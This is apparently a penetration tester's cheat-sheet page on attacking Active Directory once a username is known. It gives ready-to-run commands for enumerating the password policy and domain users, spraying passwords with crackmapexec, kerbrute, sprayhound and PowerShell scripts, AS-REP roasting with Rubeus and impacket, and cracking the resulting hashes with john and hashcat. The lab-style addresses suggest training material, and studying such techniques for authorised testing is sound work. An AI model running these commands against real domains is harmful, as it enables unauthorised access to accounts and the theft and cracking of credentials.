# With Username

## Get the password policy

{% hint style="info" %}
You need credentials for getting the password policy, but you should get the policy before starting a password spraying
{% endhint %}

{% tabs %}
{% tab title="crackmapexec" %}

```
cme <ip> -u "user" -p "password" --pass-pol
```

{% endtab %}

{% tab title="enum4linux" %}
enum4linux -u "user" -p "password" -P \<ip>
{% endtab %}

{% tab title="rpcclient" %}

```
rpcclient -U "" -N IP
```

```
rpcclient $> getdompwinfo
```

{% endtab %}

{% tab title="ldapsearch" %}
{% code overflow="wrap" %}

```
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength
```

{% endcode %}
{% endtab %}

{% tab title="PowerView" %}

```
import-module .\PowerView.ps1
Get-DomainPolicy
```

{% endtab %}

{% tab title="Windows Tools" %}

```
net accounts
```

{% endtab %}
{% endtabs %}

## Making a Target User List

{% tabs %}
{% tab title="enum4linux" %}

```
enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"
```

{% endtab %}

{% tab title="rpcclient" %}

```
rpcclient -U "" -N 172.16.5.5
```

{% endtab %}

{% tab title="crackmapexec" %}

```
cme smb 172.16.5.5 --users
```

```
sudo cme smb 172.16.5.5 -u user -p password --users
```

{% endtab %}

{% tab title="ldapsearch" %}
{% code overflow="wrap" %}

```
ldapsearch -h 172.16.5.5 -x -b "DC=domain,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "
```

{% endcode %}
{% endtab %}

{% tab title="windapsearch" %}

```
./windapsearch.py --dc-ip IP -u "" -U
```

{% endtab %}

{% tab title="kerbrute" %}

```
kerbrute userenum -d domain --dc IP wordlist.txt 
```

{% endtab %}
{% endtabs %}

## Password Spraying

{% tabs %}
{% tab title="crackmapexec" %}

```
sudo cme smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
```

{% endtab %}

{% tab title="kerbrute" %}

```
kerbrute passwordspray -d domain --dc DCIP valid_users.txt Password
```

{% endtab %}

{% tab title="sprayhound" %}

```
sprayhound -U <users.txt> -d <domain> -dc <dc-ip>
```

{% endtab %}

{% tab title="rpcclient" %}
{% code overflow="wrap" %}

```
for u in $(cat valid_users.txt);do rpcclient -U "$u%<password>" -c "getusername;quit" <dc-ip>| grep Authority; done
```

{% endcode %}
{% endtab %}

{% tab title="Windows" %}

```
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password Password -OutFile spray_success -ErrorAction SilentlyContinue
```

[Spray-Passwords.ps1](https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1)

```
.\Spray-Passwords.ps1 -Pass <PASSWORD> -Admin
```

{% endtab %}
{% endtabs %}

## ASREPRoast

{% tabs %}
{% tab title="Step 1" %}
**Identify vulnerable account with enabled "Do not require preauthentication" option.**

**Kerbrute**

```
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 
```

**PowerView**

<pre><code><strong>Get-DomainUser -PreauthNotRequired -Properties SamAccountName
</strong></code></pre>

{% endtab %}

{% tab title="Step 2" %}
**Exploit AS-REP Roasting to extract password hashes.**

**Rubeus.exe**

```
.\Rubeus.exe asreproast /user:username /format:hashcat /outfile:hash.txt

```

**Get-NPUsers**

```
impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file_name> <domain/user>

GetNPUsers.py domain/ -usersfile users.txt -dc-ip <ip> -format hashcat -request
```

{% endtab %}

{% tab title="Step 3" %}
**Crack hashes for plaintext passwords.**

**john**

```
.\john.exe hash.txt --format=krb5asrep -wordlist=wordlist
```

**hashcat**

```
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt 
```

{% endtab %}
{% endtabs %}

If we found a hash and we want to crack them:

[hash-cracking](https://m4rcg04m.gitbook.io/m4rcg04m/notes/explotation/password-attacks/hash-cracking "mention")

<figure><img src="https://2861405377-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjlU2uTByjgI9M2B6y0iJ%2Fuploads%2Fgit-blob-1409fe636434f812ad131428a48b8b104599aa69%2Fimage.png?alt=media" alt=""><figcaption></figcaption></figure>